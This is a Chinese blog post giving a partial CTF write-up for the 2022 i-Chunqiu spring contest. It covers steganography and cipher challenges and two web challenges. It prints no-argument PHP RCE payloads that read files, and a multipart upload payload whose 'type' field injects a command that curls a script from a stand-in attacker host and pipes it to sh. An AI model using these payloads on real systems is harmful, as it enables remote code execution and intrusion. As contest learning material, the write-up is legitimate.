2022年i春秋春季赛勇者赛道部分wp

最新推荐文章于 2023-05-30 21:05:27 发布
最新推荐文章于 2023-05-30 21:05:27 发布
阅读量962 收藏 2
点赞数 1
分类专栏: ctf 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988816/article/details/124666035
版权

差几名就能拿奖了,还是太菜了

Misc

签到

照着图片弹钢琴就会出现flag

tiger

一个rot47加密,一个lsb隐写加密

之后得到解压密码71zr9H6jnXRHn64WBxMbCzz16saCZWiw

发现好像需要明文攻击来解密码Nh6i@=

二维码存在零宽隐写,这里话有个坑点,直接扫好像是提不出来的,可以写个脚本来提

或者我看wp可以用bcTester来题(GET新点)之后用网站解码就可以

https://yuanfux.github.io/zero-width-web/

接着就是维吉尼亚密码解密

https://www.guballa.de/vigenere-solver

解码得到flag

Capture Radiate Chart

用010打开时就发现异常,有好多IDAT 块,一开始以为是每块有个base64啥的去解密,看完wp发现需要提出来每个块的crc32的最后一位,补上文件头和尾来构成一个压缩包

贴一个脚本


f = open('alien.png', 'rb')
n = 0
s = f.read(1)
ImageHex = ''

while s:
    byte = ord(s)
    n = n+1
    s = f.read(1)
    ImageHex += '%02x' % (byte)
print('\n\ntotal bytes: %d' % n)
f.close()

CRCHex = ImageHex .split('49444154')
Result = ''

for i in range(len(CRCHex)):
    Result += CRCHex[i][-10:-8]
print(CRCHex[1][-10:-8])

with open('output.txt', 'w') as f:
    f.write(Result)

Web

Mercy-code

无参rce+条件竞争

直接无参rce会发现过滤了太多函数不可行,必须想另一种方法

解到可以用uniqid加上strrev函数随机取值然后爆破出我们想要的字符

echo(implode(scandir(chr(strrev(uniqid())))));

爆破当前目录

会发现疑似flag文件,提示我们flag在当前目录下面

读取的两种方法

show_source(end(scandir(chr(strrev(uniqid())))));
var_dump(show_source(pos(array_reverse(scandir(chr(ord(hebrev(crypt(time())))))))));

当前目录下访问还是挺简单的,有的题目flag在上级目录,可以看看下面如何构造
https://xz.aliyun.com/t/6737?page=34

picture convert

python写的文件上传,测试了一下,似乎思路就是用session的值来进行命令执行,但在比赛中有点没太看明白利用的具体流程卡在了最后一步。

看完官方题解发现可以控制type值来操控session

贴一个官网解


----WebKitFormBoundary4aWxnEciPGAAwu2N
Content-Disposition: form-data; name="type";
Content-Type: image/png

'|| curl https://your-shell.com/ip:port |sh || '
------WebKitFormBoundary4aWxnEciPGAAwu2N
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png



------WebKitFormBoundary4aWxnEciPGAAwu2N--

开始以为挺难的,其实一看不是这么难,还是太菜了
还是需要学习啊,从wp中学到不少新东西,准备下周学习一下

XINO丶
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋Web wp
ChanCherry的博客
09-16 500
0x00 爆破-1 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 这个代码的意义是如果匹配正则/^\w*$/,就打印变量$$a。...
2022职场人群春季健康状态解析报告.pdf
04-13
2022职场人群春季健康状态解析】 在2022春季,职场人群的健康状况呈现出一系列显著特征。首先,春困乏力成为普遍现象,许多人在工作中感到精力不济,这可能影响到工作效率。春困是由于季节转换,人体生物钟...
i春秋wp
飞鱼的企鹅的博客
01-04 434
我会擦去因为太菜留下的泪水,还会装作一切都无所谓的样子! 爆破1 我是按照做题人数有多到少来做的,由简入繁嘛! 这道题需要传入参数hello,post和get方式都可以。做了一个简单的正则匹配,意思是输入字母或数字。主要看的是var_dump()这个函数。 所以这里就要用到超全局变量GLOBALS了,使用get或post方式传入 GLOBALS可以显示出来所有的变量,在里面可以找到flag...
2021-i春秋-春季逆向WP
m0_51713041的博客
06-25 573
2021-i春秋-春季 一:backdoor 参考了一些Go语言的Socket编程 https://www.cnblogs.com/yinzhengjie/p/7261584.html https://studygolang.com/articles/14344 https://blog.csdn.net/natpan/article/details/82866619 https://blog.csdn.net/RA681t58CJxsgCkJ31/article/details/103258253 顾名
i春秋春季2023
qq_59700927的博客
05-19 595
i春秋春季2023
i春秋之SQL(详细WP
金 帛的博客
02-22 1521
i春秋webWP
2022中小学春季开学攻略.doc
02-19
2022中小学春季开学攻略】 开学是每个学生和家长的重要时刻,标志着新的学习阶段的开始。在这个过程中,家长和孩子都需要做好充分的准备,以确保顺利过渡到新学期。以下是一些关键的准备步骤: 1. 回顾假期...
2022幼儿园春季开学通知范文.docx
02-13
2022幼儿园春季开学通知范文】的文档主要涉及了开学前的准备工作、入园须知、在园期间的行为规范以及应对孩子开学焦虑的策略。以下是对这些内容的详细解读: 1. **开学前的准备工作**: - **返园条件**:家长...
2022春季就业市场趋势观察.pdf
04-02
总体来看,2022春季的就业市场呈现多样化趋势,高端制造业和高技能人才的需求强劲,而部分行业如互联网、教育培训和房地产则面临调整。这反映了中国就业市场的结构性变化,也突显了对高素质人才和技术创新的重视。...
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4391
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
i春秋“网络内生安全试验场”CTF答题夺旗(第四季)部分题目WP
李熠专用博客_白帽子一枚,人称低危终结者
12-30 2819
1.nani 构造payload,拿到user.php源码:http://120.55.43.255:24719/?file=php://filter/read=convert.base64-encode/resource=./user.php <?php class convent{ var $warn = "No hacker."; function __destruct(){ ...
2023春秋春季WP-REVERSE(AK)
m0_68757308的博客
05-19 1720
2023春秋春季WP-REVERSE(AK)
i春秋网络内生安全试验场CTF夺旗(第二季)部分wp
qq_42188168的博客
10-26 919
i春秋 2019-10月CTF答题夺旗 web部分wp 1.easyphp 通过观察可以发现img传参base64解码;同样的方法可得index.php源码 之后构造序列化。。。。。 2、calculate1,2 写wp前删掉了脚本,简述下:利用selenium运算公式并结合chromedriver进行10次提交 3、babysql 之后测试admin’orderby 1# 到3,直到4...
ichunqiu春季勇者山峰pwn-chunzhiIOT&torghast
xiaf5的博客
05-10 579
ichunqiuIOT ​最难的地方在于逆向懂协议的组成,动手调一调就好了 漏洞点很明显是释放堆块后没有清除相应的指针 由于libc是2.33会有一个指针加密,详细的看这个师傅的文章一道题学习glibc-2.32异或加密 exp ​from pwn import * from LibcSearcher import * p = process('./abc') # p=remote() context.log_level = 'debug' libc=ELF('./libc.so') r = lambda
2023春秋网络安全春季Reverse题目复现
最新发布
OrientalGlass的博客
05-30 1267
下方的call sun_7f006f7c2536就是主函数,跟进重新识别即可看到逻辑(这里不做详细介绍,以选项2为主)往上翻找到起始地址,对loc_loc_7F3BB0FB6536按p识别为函数就可以看到主函数逻辑了。然后还有一些没有被正确识别的函数,需要手动跟进按p识别为函数,然后回到反汇编界面按f5重新识别即可。另外两块红色区域同理,重新识别后可以看到主函数(如果看不到那就对tea函数交叉引用向上找)一直按f7,最后可以发现程序会卡住,并且还能看见InputFlag字符串,这里就是主函数了。
Bugku、i春秋解题 web wp(一)
m0_55854679的博客
05-14 782
Simple_SSTI_1(python模板注入) 启动常见后只有一行字母,我们什么也看不出来。点击右键,查看网页源代码 倒数第三行绿色的字 <!-- You know, in the flask, We often set a secret_key variable.--> 意思是 你知道,在flask【一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。】里,我们经常设置一个secret_key变量,所以我们要读secret_key变量,导
2022春秋网络安全春季 勇者山峰
shinygod的博客
05-08 1354
Mercy-code if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd))这个过滤就代表了是无参rce。 <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { echo chr(strrev(un
2022春秋网络安全春季 勇者山峰部分WP
大雾
05-08 2326
Misc 签到 题目描述:题目内容:因为疫情,有多久没听到上课铃声了。 (如果你还不知道怎么签到,关注“春秋伽玛”公众号,回复“上课铃声”可以拿到进一步提示) 关注公众号回复上课铃声得到 照着按就完了 最终按对会出个弹框跳转到有flag的页面 flag{27033a89-55dd-46dc-82b9-cd89a4da957d} tiger 题目描述:无 从中可以发现因此: ag2a`f76 是 rot47 加密,解密为:28a217fe rot47解密 PNG 图片是 LSB 加密lsb解密工具 解.
2022春秋杯,勇者山峰
Pai_Space
05-13 903
Misc,签到 题目描述:题目内容:因为疫情,有多久没听到上课铃声了。(如果你还不知道怎么签到,关注“春秋伽玛”公众号,回复“上课铃声”可以拿到进一步提示) 按顺序用鼠标停留在键位后,没有东西显现,鼠标再在最后两个白键晃动,显现 flag Misc,tiger 解压出四个文件 tips 文件 1.These are rot for 47 days 2.Have you heard that lsb steganography also requires a password

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值